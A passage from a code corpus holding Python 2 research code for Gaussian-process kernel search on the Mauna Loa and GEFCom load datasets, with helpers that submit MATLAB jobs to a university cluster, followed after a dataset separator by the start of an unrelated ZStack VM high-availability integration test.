data = scipy.io.loadmat(data_file)
return data['X'], data['y']
def load_mauna_original():
"""
Original Mauna dataset made to match the experiments from Carl's book.
For details, see data/preprocess_mauna_2004.m
"""
data_file = '../data/mauna2003.mat'
data = scipy.io.loadmat(data_file)
return data['X'], data['y']
def call_gpml_test():
np.random.seed(0)
k = fk.SumKernel([fk.SqExpKernel(0, 0), fk.SqExpKernel(0, 0)])
print k.gpml_kernel_expression()
print k.pretty_print()
print '[%s]' % k.param_vector()
X, y = load_mauna()
N_orig = X.shape[0]
X = X[:N_orig//3, :]
y = y[:N_orig//3, :]
results = []
pylab.figure()
for i in range(15):
init_params = np.random.normal(size=k.param_vector().size)
#kernel_hypers, nll, nlls = gpml.optimize_params(k.gpml_kernel_expression(), k.param_vector(), X, y, return_all=True)
kernel_hypers, nll, nlls = gpml.optimize_params(k.gpml_kernel_expression(), init_params, X, y, return_all=True)
print "kernel_hypers =", kernel_hypers
print "nll =", nll
k_opt = k.family().from_param_vector(kernel_hypers)
print k_opt.gpml_kernel_expression()
print k_opt.pretty_print()
print '[%s]' % k_opt.param_vector()
pylab.semilogx(range(1, nlls.size+1), nlls)
results.append((kernel_hypers, nll))
pylab.draw()
print
print
results = sorted(results, key=lambda p: p[1])
for kernel_hypers, nll in results:
print nll, kernel_hypers
print "done"
def sample_mauna_best():
# This kernel was chosen from a run of Mauna datapoints.
kernel = ( fk.SqExpKernel(-0.7, -1.3) + fk.SqExpKernel(4.8, 2.3) ) * \
( fk.SqExpKernel(3.0, 0.5) + fk.SqExpPeriodicKernel(0.4, -0.0, -0.9) )
X = np.linspace(0,50,500)
# Todo: set random seed.
sample = gpml.sample_from_gp_prior(kernel, X)
pylab.figure()
pylab.plot(X, sample)
pylab.title('( SqExp(ell=-0.7, sf=-1.3) + SqExp(ell=4.8, sf=2.3) ) \n x ( SqExp(ell=3.0, sf=0.5) + Periodic(ell=0.4, p=-0.0, sf=-0.9) )')
def sample_Carls_kernel():
kernel = fk.Carls_Mauna_kernel()
X = np.linspace(0,50,500)
# Todo: set random seed.
sample = gpml.sample_from_gp_prior(kernel, X)
pylab.figure()
pylab.plot(X, sample)
pylab.title('Carl''s kernel');
def compare_kernels_experiment():
kernel1 = fk.Carls_Mauna_kernel()
kernel2 = ( fk.SqExpKernel(-0.7, -1.3) + fk.SqExpKernel(4.8, 2.3) ) * \
( fk.SqExpKernel(3.0, 0.5) + fk.SqExpPeriodicKernel(0.4, -0.0, -0.9) )
#kernel2 = ( SqExp(ell=-0.8, sf=-1.4) + Periodic(ell=0.5, p=-0.3, sf=-1.1) + RQ(ell=1.9, sf=1.6, a=0.2) + ( SqExp(ell=4.5, sf=1.0) x Periodic(ell=0.6, p=-0.0, sf=0.1) ) )
X, y = load_mauna_original()
N_orig = X.shape[0] # subsample data.
X = X[:N_orig//5, :]
y = y[:N_orig//5, :]
print "Carl's kernel"
print kernel1.pretty_print()
kernel_hypers1, nll1 = gpml.optimize_params(kernel1.gpml_kernel_expression(), kernel1.param_vector(), \
X, y, noise=np.log(0.19), iters=100 )
k1_opt = kernel1.family().from_param_vector(kernel_hypers1)
print k1_opt.pretty_print()
print "Carl's NLL =", nll1
print "Our kernel"
print kernel2.pretty_print()
kernel_hypers2, nll2 = gpml.optimize_params(kernel2.gpml_kernel_expression(), kernel2.param_vector(), \
X, y, noise=np.log(0.19), iters=100)
k2_opt = kernel2.family().from_param_vector(kernel_hypers2)
print k2_opt.pretty_print()
print "Our NLL =", nll2
def simple_mauna_experiment():
'''A first version of an experiment learning kernels'''
seed_kernels = [fk.SqExpKernel(0, 0)]
X, y = load_mauna_original()
N_orig = X.shape[0] # subsample data.
X = X[:N_orig//3, :]
y = y[:N_orig//3, :]
max_depth = 4
k = 4 # Expand k best
nll_key = 1
laplace_key = 2
results = []
for dummy in range(max_depth):
new_results = structure_search.try_expanded_kernels(X, y, D=2, seed_kernels=seed_kernels, verbose=False)
results = results + new_results
print
results = sorted(results, key=lambda p: p[nll_key], reverse=True)
for kernel, nll, laplace in results:
print nll, laplace, kernel.pretty_print()
seed_kernels = [r[0] for r in sorted(new_results, key=lambda p: p[nll_key])[0:k]]
def plot_Carls_kernel():
kernel = fk.Carls_Mauna_kernel()
X = np.linspace(0,10,1000)
sigma = gpml.plot_kernel(kernel, X)
pylab.figure()
pylab.plot(X, sigma)
pylab.title('Carl''s kernel');
def plot_our_kernel():
kernel = ( fk.SqExpKernel(-0.7, -1.3) + fk.SqExpKernel(4.8, 2.3) ) * \
( fk.SqExpKernel(3.0, 0.5) + fk.SqExpPeriodicKernel(0.4, -0.0, -0.9) )
X = np.linspace(0,10,1000)
sigma = gpml.plot_kernel(kernel, X)
pylab.figure()
pylab.plot(X, sigma)
pylab.title('Our kernel');
def load_simple_gef_load():
'''Zone 1 and temperature station 2'''
data_file = '../data/gef_load_simple.mat'
data = scipy.io.loadmat(data_file)
return data['X'], data['y']
def load_full_gef_load():
'''20 Zones in y, time and 11 temp stations in X'''
data_file = '../data/gef_load_full_Xy.mat'
data = scipy.io.loadmat(data_file)
return data['X'], data['y']
def simple_gef_load_experiment(verbose=True):
'''A first version of an experiment learning kernels'''
seed_kernels = [fk.MaskKernel(2, 0, fk.SqExpKernel(0, 0)),
fk.MaskKernel(2, 1, fk.SqExpKernel(0, 0))]
X, y = load_simple_gef_load()
# subsample data.
X = X[0:99, :]
y = y[0:99, :]
max_depth = 5
k = 2 # Expand k best
nll_key = 1
BIC_key = 2
active_key = BIC_key
results = []
for dummy in range(max_depth):
new_results = structure_search.try_expanded_kernels(X, y, D=2, seed_kernels=seed_kernels, verbose=verbose)
results = results + new_results
print
results = sorted(results, key=lambda p: p[active_key], reverse=True)
for kernel, nll, BIC in results:
print nll, BIC, kernel.pretty_print()
seed_kernels = [r[0] for r in sorted(new_results, key=lambda p: p[active_key])[0:k]]
def full_gef_load_experiment(zone=1, max_depth=5, verbose=True):
'''Round 2'''
# seed_kernels = [fk.MaskKernel(2, 0, fk.SqExpKernel(0, 0)),
# fk.MaskKernel(2, 1, fk.SqExpKernel(0, 0))]
seed_kernels = [fk.MaskKernel(12, i, fk.SqExpKernel(0., 0.)) for i in range(12)] + \
[fk.MaskKernel(12, i, fk.SqExpPeriodicKernel(0., 0., 0.)) for i in range(12)] + \
[fk.MaskKernel(12, i, fk.RQKernel(0., 0., 0.)) for i in range(12)]
X, y = load_full_gef_load()
# subsample data.
X = X[0:299, :]
y = y[0:299, zone-1]
# max_depth = 5
k = 2 # Expand k best
nll_key = 1
BIC_key = 2
active_key = BIC_key
results = []
for i in range(max_depth):
if i:
expand = True
else:
expand = False
new_results = structure_search.try_expanded_kernels(X, y, D=12, seed_kernels=seed_kernels, expand=expand, verbose=verbose)
results = results + new_results
print
results = sorted(results, key=lambda p: p[active_key], reverse=True)
for kernel, nll, BIC in results:
print nll, BIC, kernel.pretty_print()
seed_kernels = [r[0] for r in sorted(new_results, key=lambda p: p[active_key])[0:k]]
#os.system(command_str)
#### Attempt at sending individual jobs to the cluster
import pysftp, tempfile, config, subprocess, config, time
nax = np.newaxis
def mkstemp_safe(directory, suffix):
(os_file_handle, file_name) = tempfile.mkstemp(dir=directory, suffix=suffix)
os.close(os_file_handle)
return file_name
def fear_connect():
return pysftp.Connection('fear', username=config.USERNAME, password=config.PASSWORD)
def fear_command(cmd, fear=None):
if not fear is None:
srv = fear
else:
srv = fear_connect()
output = srv.execute(cmd)
if fear is None:
srv.close()
return output
def copy_to_fear(local_path, remote_path, fear=None):
if not fear is None:
srv = fear
else:
srv = fear_connect()
srv.put(local_path, remote_path)
if fear is None:
srv.close()
def copy_from_fear(remote_path, local_path, fear=None):
if not fear is None:
srv = fear
else:
srv = fear_connect()
srv.get(remote_path, local_path)
if fear is None:
srv.close()
def fear_rm(remote_path, fear=None):
if not fear is None:
srv = fear
else:
srv = fear_connect()
output = srv.execute('rm %s' % remote_path)
if fear is None:
srv.close()
return output
def fear_file_exists(remote_path, fear=None):
if not fear is None:
srv = fear
else:
srv = fear_connect()
response = srv.execute('if [ -e %s ] \nthen \necho ''exists'' \nfi' % remote_path)
if fear is None:
srv.close()
return response == ['exists\n']
def fear_qdel_all(fear=None):
if not fear is None:
srv = fear
else:
srv = fear_connect()
output = srv.execute('. /usr/local/grid/divf2/common/settings.sh; qdel -u %s' % config.USERNAME)
if fear is None:
srv.close()
return output
def qsub_matlab_code(code, verbose=True, local_dir ='../temp/', remote_dir ='./temp/', fear=None):
# Write to a temp script
script_file = mkstemp_safe(local_dir, '.m')
shell_file = mkstemp_safe(local_dir, '.sh')
f = open(script_file, 'w')
f.write(code)
f.close()
#### Local file reference without extension - MATLAB fails silently otherwise
f = open(shell_file, 'w')
f.write('/usr/local/apps/matlab/matlabR2011b/bin/matlab -nosplash -nojvm -nodisplay -singleCompThread -r ' + script_file.split('/')[-1].split('.')[0] + '\n')
f.close()
# Copy this to fear
copy_to_fear(script_file, remote_dir + script_file.split('/')[-1], fear)
copy_to_fear(shell_file, remote_dir + shell_file.split('/')[-1], fear)
# Create fear call
#### WARNING - hardcoded path 'temp'
fear_string = ' '.join(['. /usr/local/grid/divf2/common/settings.sh;',
'cd temp;'
'chmod +x %s;' % shell_file.split('/')[-1],
'qsub -l lr=0',
shell_file.split('/')[-1] + ';',
'cd ..'])
if verbose:
print 'Submitting : %s' % fear_string
# Send this command to fear
fear_command(fear_string, fear)
# Tell the caller where the script file was written
return script_file, shell_file
def re_qsub(shell_file, verbose=True, fear=None):
# Create fear call
#### WARNING - hardcoded path 'temp'
fear_string = ' '.join(['. /usr/local/grid/divf2/common/settings.sh;',
'cd temp;'
'chmod +x %s;' % shell_file.split('/')[-1],
'qsub -l lr=0',
shell_file.split('/')[-1] + ';',
'cd ..'])
if verbose:
print 'Re-submitting : %s' % fear_string
# Send this command to fear
fear_command(fear_string, fear)
# Matlab code to optimise hyper-parameters on one file, given one kernel.
OPTIMIZE_KERNEL_CODE = r"""
%% Load the data, it should contain X and y.
a = 'trying to load data files'
load '%(datafile)s'
a = 'loaded data files'
%% Load GPML
addpath(genpath('%(gpml_path)s'));
a = 'loaded GPML'
%% Set up model.
meanfunc = {@meanConst}
hyp.mean = mean(y)
covfunc = %(kernel_family)s
hyp.cov = %(kernel_params)s
likfunc = @likGauss
hyp.lik = %(noise)s
[hyp_opt, nlls] = minimize(hyp, @gp, -%(iters)s, @infExact, meanfunc, covfunc, likfunc, X, y);
best_nll = nlls(end)
laplace_nle = best_nll %% HACK HACK HACK
save( '%(writefile)s', 'hyp_opt', 'best_nll', 'nlls', 'laplace_nle' );
a = 'Goodbye, World!'
exit();
"""
def fear_run_experiments(kernels, X, y, return_all=False, verbose=True, noise=None, iters=300, local_dir ='../temp/', remote_dir ='./temp/', \
sleep_time=10, n_sleep_timeout=6, re_submit_wait=60):
'''
Sends jobs to fear, waits for them, returns the results
'''
# Not sure what this is for
if X.ndim == 1:
X = X[:, nax]
if y.ndim == 1:
y = y[:, nax]
if noise is None:
noise = np.log(np.var(y)/10) #### Just a heuristic.
data = {'X': X, 'y': y}
# Setup the connection to fear
fear = fear_connect()
# Submit all the jobs and remember where we put them
data_files = []
write_files = []
script_files = []
shell_files = []
for kernel in kernels:
# Create data file and results file
data_files.append(mkstemp_safe(local_dir, '.mat'))
write_files.append(mkstemp_safe(local_dir, '.mat'))
# Save data
scipy.io.savemat(data_files[-1], data)
# Copy files to fear
copy_to_fear(data_files[-1], remote_dir + data_files[-1].split('/')[-1], fear)
# copy_to_fear(write_files[-1], remote_dir + write_files[-1].split('/')[-1])
# Create MATLAB code
code = OPTIMIZE_KERNEL_CODE % {'datafile': data_files[-1].split('/')[-1],
'writefile': write_files[-1].split('/')[-1],
'gpml_path': config.FEAR_GPML_PATH,
'kernel_family': kernel.gpml_kernel_expression(),
'kernel_params': '[ %s ]' % ' '.join(str(p) for p in kernel.param_vector()),
'noise': str(noise),
'iters': str(iters)}
# Submit this to fear and save the file names
script_file, shell_file = qsub_matlab_code(code=code, verbose=verbose, local_dir=local_dir, remote_dir=remote_dir, fear=fear)
script_files.append(script_file)
shell_files.append(shell_file)
# Let the scripts run
# if verbose:
# print 'Giving the jobs some time to run'
# time.sleep(re_submit_wait)
# Wait for and read in results
fear_finished = False
job_finished = [False] * len(write_files)
results = [None] * len(write_files)
sleep_count = 0
while not fear_finished:
for (i, write_file) in enumerate(write_files):
if not job_finished[i]:
if fear_file_exists(remote_dir + write_file.split('/')[-1], fear):
# Another job has finished
job_finished[i] = True
sleep_count = 0
# Copy files
os.remove(write_file) # Not sure if necessary
copy_from_fear(remote_dir + write_file.split('/')[-1], write_file, fear)
# Read results ##### THIS WILL CHANGE IF RUNNING DIFFERENT TYPE OF EXPERIMENT
gpml_result = scipy.io.loadmat(write_file)
optimized_hypers = gpml_result['hyp_opt']
nll = gpml_result['best_nll'][0, 0]
# nlls = gpml_result['nlls'].ravel()
laplace_nle = gpml_result['laplace_nle'][0, 0]
kernel_hypers = optimized_hypers['cov'][0, 0].ravel()
k_opt = kernels[i].family().from_param_vector(kernel_hypers)
BIC = 2 * nll + len(kernel_hypers) * np.log(y.shape[0])
results[i] = (k_opt, nll, laplace_nle, BIC)
# Tidy up
fear_rm(remote_dir + data_files[i].split('/')[-1], fear)
fear_rm(remote_dir + write_files[i].split('/')[-1], fear)
fear_rm(remote_dir + script_files[i].split('/')[-1], fear)
fear_rm(remote_dir + shell_files[i].split('/')[-1], fear)
fear_rm(remote_dir + shell_files[i].split('/')[-1] + '*', fear)
os.remove(data_files[i])
os.remove(write_files[i])
os.remove(script_files[i])
os.remove(shell_files[i])
# Tell the world
if verbose:
print '%d / %d jobs complete' % (sum(job_finished), len(job_finished))
if sum(job_finished) == len(job_finished):
fear_finished = True
if not fear_finished:
if verbose:
print 'Sleeping'
sleep_count += 1
if sleep_count < n_sleep_timeout:
time.sleep(sleep_time)
else:
# Jobs taking too long - assume failure - resubmit
fear_qdel_all(fear)
for (i, shell_file) in enumerate(shell_files):
if not job_finished[i]:
re_qsub(shell_file, verbose=verbose, fear=fear)
if verbose:
print 'Giving the jobs some time to run'
time.sleep(re_submit_wait)
sleep_count = 0
fear.close()
return results
def fear_load_mat(data_file, y_dim=1):
'''Load a Matlab file'''
data = scipy.io.loadmat(data_file)
return data['X'], data['y'][:,y_dim-1], np.shape(data['X'])[1]
def fear_expand_kernels(D, seed_kernels, verbose=False):
'''
Just expands
'''
g = grammar.MultiDGrammar(D)
print 'Seed kernels :'
for k in seed_kernels:
print k.pretty_print()
kernels = []
for k in seed_kernels:
kernels = kernels + grammar.expand(k, g)
kernels = grammar.remove_duplicates(kernels)
print 'Expanded kernels :'
for k in kernels:
print k.pretty_print()
return (kernels)
def fear_experiment(data_file, results_filename, y_dim=1, subset=None, max_depth=2, k=2, verbose=True, sleep_time=60, n_sleep_timeout=20, re_submit_wait=60, \
description=''):
'''Recursively search for the best kernel'''
X, y, D = fear_load_mat(data_file, y_dim)
# Subset if necessary
if not subset is None:
X = X[subset, :]
y = y[subset]
##### This should be abstracted
seed_kernels = [fk.MaskKernel(D, i, fk.SqExpKernel(0., 0.)) for i in range(D)] + \
[fk.MaskKernel(D, i, fk.SqExpPeriodicKernel(0., 0., 0.)) for i in range(D)] + \
[fk.MaskKernel(D, i, fk.RQKernel(0., 0., 0.)) for i in range(D)]
nll_key = 1
laplace_key = 2
BIC_key = 3
active_key = BIC_key
results = []
results_sequence = []
for r in range(max_depth):
if r == 0:
new_results = fear_run_experiments(seed_kernels, X, y, verbose=verbose, \
sleep_time=sleep_time, n_sleep_timeout=n_sleep_timeout, re_submit_wait=re_submit_wait)
else:
new_results = fear_run_experiments(fear_expand_kernels(D, seed_kernels, verbose=verbose), X, y, verbose=verbose, \
sleep_time=sleep_time, n_sleep_timeout=n_sleep_timeout, re_submit_wait=re_submit_wait)
results = results + new_results
print
results = sorted(results, key=lambda p: p[active_key], reverse=True)
for kernel, nll, laplace, BIC in results:
print nll, laplace, BIC, kernel.pretty_print()
seed_kernels = [r[0] for r in sorted(new_results, key=lambda p: p[active_key])[0:k]]
results_sequence.append(results)
# Write results to a file
results = sorted(results, key=lambda p: p[active_key], reverse=True)
with open(results_filename, 'w') as outfile:
outfile.write('Experiment results for\n datafile = %s\n y_dim = %d\n subset = %s\n max_depth = %f\n k = %f\n Description = %s\n\n' % (data_file, y_dim, subset, max_depth, k, description))
for (i, results) in enumerate(results_sequence):
outfile.write('\n%%%%%%%%%% Level %d %%%%%%%%%%\n\n' % i)
for kernel, nll, laplace, BIC in results:
outfile.write( 'nll=%f, laplace=%f, BIC=%f, kernel=%s\n' % (nll, laplace, BIC, kernel.__repr__()))
from mpl_toolkits.axes_grid1 import host_subplot
import mpl_toolkits.axisartist as AA
import matplotlib.pyplot as plt
def plot_gef_load_Z01_raw():
X, y, D = fear_load_mat('../data/gef_load_full_Xy.mat', 1)
host = host_subplot(111, axes_class=AA.Axes)
plt.subplots_adjust(right=0.85)
par1 = host.twinx()
# host.set_xlim(0, 2)
# host.set_ylim(0, 2)
host.set_xlabel("Time")
host.set_ylabel("Load (Z01)")
par1.set_ylabel("Temperature (T09)")
p1, = host.plot(X[0:499,0], y[0:499])
p2, = par1.plot(X[0:499,0], X[0:499,9])
# par1.set_ylim(0, 4)
host.legend()
host.axis["left"].label.set_color(p1.get_color())
par1.axis["right"].label.set_color(p2.get_color())
plt.draw()
plt.show()
def plot_gef_load_Z01_split_mean():
X, y, D = fear_load_mat('../data/gef_load_full_Xy.mat', 1)
kernel = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
(fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064)) + fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718)))
kernel_1 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064))
posterior_mean_1 = gpml.posterior_mean(kernel, kernel_1, X[0:499,:], y[0:499])
kernel_2 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718))
posterior_mean_2 = gpml.posterior_mean(kernel, kernel_2, X[0:499,:], y[0:499])
host = host_subplot(111, axes_class=AA.Axes)
plt.subplots_adjust(right=0.85)
par1 = host.twinx()
# host.set_xlim(0, 2)
# host.set_ylim(0, 2)
host.set_xlabel("Time")
host.set_ylabel("Periodic component")
plt.title('Posterior mean functions')
par1.set_ylabel("Smooth component")
p1, = host.plot(X[0:499,0], posterior_mean_1)
p2, = par1.plot(X[0:499,0], posterior_mean_2)
# par1.set_ylim(0, 4)
host.legend()
host.axis["left"].label.set_color(p1.get_color())
par1.axis["right"].label.set_color(p2.get_color())
plt.draw()
plt.show()
def plot_gef_load_Z01_split_mean_temp():
X, y, D = fear_load_mat('../data/gef_load_full_Xy.mat', 1)
kernel = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
(fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064)) + fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718)))
kernel_1 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064))
posterior_mean_1 = gpml.posterior_mean(kernel, kernel_1, X[0:499,:], y[0:499], iters=10)
kernel_2 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718))
posterior_mean_2 = gpml.posterior_mean(kernel, kernel_2, X[0:499,:], y[0:499], iters=10)
plt.figure()
host = host_subplot(111, axes_class=AA.Axes)
plt.subplots_adjust(right=0.85)
par1 = host.twinx()
# host.set_xlim(0, 2)
# host.set_ylim(0, 2)
host.set_xlabel("Temperature (T09)")
# par1.set_ylabel("Periodic component")
plt.title('Posterior mean function')
host.set_ylabel("Load posterior mean")
p2, = host.plot(X[0:499,9], y[0:499], 'o', alpha=0.5)
p1, = host.plot(X[0:499,9], posterior_mean_2, 'o')
# par1.set_ylim(0, 4)
host.legend()
host.axis["left"].label.set_color(p1.get_color())
# par1.axis["right"].label.set_color(p2.get_color())
plt.draw()
plt.show()
def plot_gef_load_Z01_smooth_2d_mean():
X, y, D = fear_load_mat('../data/gef_load_full_Xy.mat', 1)
kernel = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
(fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064)) + fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718)))
kernel_1 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064))
kernel_2 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718))
min_T = -3.0
max_T = 1.0
N_T = 10
temps = np.repeat(np.linspace(min_T, max_T, N_T), 499)
input = np.tile(X[0:499,:], (N_T, 1))
input[:,9] = temps
posterior_mean = gpml.posterior_mean(kernel, kernel_2, X[0:499,:], y[0:499], input, iters=300)
X_plt = X[0:499,0]
Y_plt = np.linspace(min_T, max_T, N_T)
Z_plt = np.reshape(posterior_mean, (N_T, 499), 'A')
data = {'X': X_plt, 'Y': Y_plt, 'Z': Z_plt, 'post_mean': posterior_mean}
scipy.io.savemat('temp_data.mat', data)
def plot_gef_load_Z01():
# This kernel was chosen from a run of gef_load datapoints.
# kernel = eval(ProductKernel([ covMask(ndim=12, active_dimension=0, base_kernel=RQKernel(lengthscale=0.268353, output_variance=-0.104149, alpha=-2.105742)), covMask(ndim=12, active_dimension=9, base_kernel=SqExpKernel(lengthscale=1.160242, output_variance=0.004344)), SumKernel([ covMask(ndim=12, active_dimension=0, base_kernel=SqExpPeriodicKernel(lengthscale=-0.823413, period=0.000198, output_variance=-0.917064)), covMask(ndim=12, active_dimension=0, base_kernel=RQKernel(lengthscale=-0.459219, output_variance=-0.077250, alpha=-2.212718)) ]) ]))
X, y, D = fear_load_mat('../data/gef_load_full_Xy.mat', 1)
kernel = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
(fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064)) + fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718)))
# Todo: set random seed.
sample = gpml.sample_from_gp_prior(kernel, X[0:499,:])
pylab.figure()
pylab.plot(X[0:499,0], y[0:499])
pylab.title('GEFCom2012 Z01 and T09 - first 500 data points')
pylab.xlabel('Time')
pylab.ylabel('Load')
# pylab.figure()
# pylab.plot(X[0:499,0], sample)
# pylab.title('GEF load Z01 - a sample from the learnt kernel')
# pylab.xlabel('Time')
# pylab.ylabel('Load')
#
# kernel_1 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
# fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064))
#
# posterior_mean_1 = gpml.posterior_mean(kernel, kernel_1, X[0:499,:], y[0:499])
#
# pylab.figure()
# pylab.plot(X[0:499,0], posterior_mean_1)
# pylab.title('GEF load Z01 - periodic posterior mean component')
# pylab.xlabel('Time')
# pylab.ylabel('Load')
#
# kernel_2 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
# fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718))
#
# posterior_mean_2 = gpml.posterior_mean(kernel, kernel_2, X[0:499,:], y[0:499])
#
# pylab.figure()
# pylab.plot(X[0:499,0], posterior_mean_2)
# pylab.title('GEF load Z01 - smooth posterior mean component')
# pylab.xlabel('Time')
# pylab.ylabel('Load')
def main():
# Run everything
# fear_experiment('../data/abalone_500.mat', '../results/abalone_500_01.txt', max_depth=4, k=3)
# fear_experiment('../data/gef_load_full_Xy.mat', '../results/gef_load_500_Z01_02.txt', max_depth=6, k=5, subset=range(500), y_dim=1, description = 'BIC, 0 init')
# fear_experiment('../data/gef_load_full_Xy.mat', '../results/gef_load_500_Z09_02.txt', max_depth=6, k=5, subset=range(500), y_dim=9, description = 'BIC, 0 init')
fear_experiment('../data/bach_synth_r_200.mat', '../results/bach_synth_r_200_test.txt', max_depth=2, k=1, description = 'Dave test')
# fear_experiment('../data/housing.mat', '../results/housing_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
# fear_experiment('../data/mauna2003.mat', '../results/mauna2003_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
# fear_experiment('../data/mauna2011.mat', '../results/mauna2011_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
# fear_experiment('../data/prostate.mat', '../results/prostate_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
# fear_experiment('../data/pumadyn256.mat', '../results/pumadyn256_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
# fear_experiment('../data/r_concrete_100.mat', '../results/r_concrete_100_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
# fear_experiment('../data/r_concrete_500.mat', '../results/r_concrete_500_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
# fear_experiment('../data/r_solar_500.mat', '../results/r_solar_500_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
# fear_experiment('../data/unicycle_pitch_angle_400.mat', '../results/unicycle_pitch_angle_400_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
# fear_experiment('../data/unicycle_pitch_ang_vel_400.mat', '../results/unicycle_pitch_ang_vel_400_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
def debug_laplace():
# Load data set
X, y, D, Xtest, ytest = gpml.load_mat('../data/kfold_data/r_concrete_500_fold_10_of_10.mat', y_dim=1)
# Load the suspicious kernel
sk = fk.repr_string_to_kernel('ScoredKernel(k_opt=ProductKernel([ MaskKernel(ndim=8, active_dimension=0, base_kernel=CubicKernel(offset=1.757755, output_variance=7.084045)), MaskKernel(ndim=8, active_dimension=7, base_kernel=SqExpPeriodicKernel(lengthscale=-2.701080, period=-0.380918, output_variance=-0.071214)) ]), nll=6348.096611, laplace_nle=-184450132.068237, bic_nle=12720.630212, noise=[-1.77276072])')
# Create some code to evaluate it
if X.ndim == 1: X = X[:, nax]
if y.ndim == 1: y = y[:, nax]
ndata = y.shape[0]
# Create data file
data_file = cblparallel.create_temp_file('.mat')
scipy.io.savemat(data_file, {'X': X, 'y': y}) # Save regression data
# Move to fear
cblparallel.copy_to_remote(data_file)
scripts = [gpml.OPTIMIZE_KERNEL_CODE % {'datafile': data_file.split('/')[-1],
'writefile': '%(output_file)s', # N.B. cblparallel manages output files
'gpml_path': cblparallel.gpml_path(local_computation=False),
'kernel_family': sk.k_opt.gpml_kernel_expression(),
'kernel_params': '[ %s ]' % ' '.join(str(p) for p in sk.k_opt.param_vector()),
'noise': str(sk.noise),
'iters': str(300)}]
#### Need to be careful with % signs
#### For the moment, cblparallel expects no single % signs - FIXME
scripts[0] = re.sub('% ', '%% ', scripts[0])
# Test
scripts[0] = re.sub('delta = 1e-6', 'delta = 1e-6', scripts[0])
#scripts[0] = re.sub('hyp.lik = [-1.77276072]', 'hyp.lik = [-0.77276072]', scripts[0])
output_file = cblparallel.run_batch_on_fear(scripts, language='matlab', max_jobs=600)[0]
# Read in results
output = gpml.read_outputs(output_file)
result = ScoredKernel.from_matlab_output(output, sk.k_opt.family(), ndata)
print result
print output.hessian
os.remove(output_file)
# Remove temporary data file (perhaps on the cluster server)
cblparallel.remove_temp_file(data_file, local_computation=False)
def debug_descriptions():
ck = fk.Carls_Mauna_kernel()
print ck.english()
|
unknown
|
codeparrot/codeparrot-clean
| ||
'''
Integration Test for creating KVM VM in MN HA mode after destroying MN VM.
@author: Mirabel
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.operations.node_operations as node_ops
import zstackwoodpecker.zstack_test.zstack_test_vm as test_vm_header
import test_stub
import time
import os
vm = None
mn_host = None
def test():
global vm
global mn_host
mn_host = test_stub.get_host_by_mn_vm(test_lib.all_scenario_config, test_lib.scenario_file)
if len(mn_host) != 1:
test_util.test_fail('MN VM is running on %d host(s)' % len(mn_host))
test_util.test_logger("destroy mn vm on host [%s]" % mn_host[0].ip_)
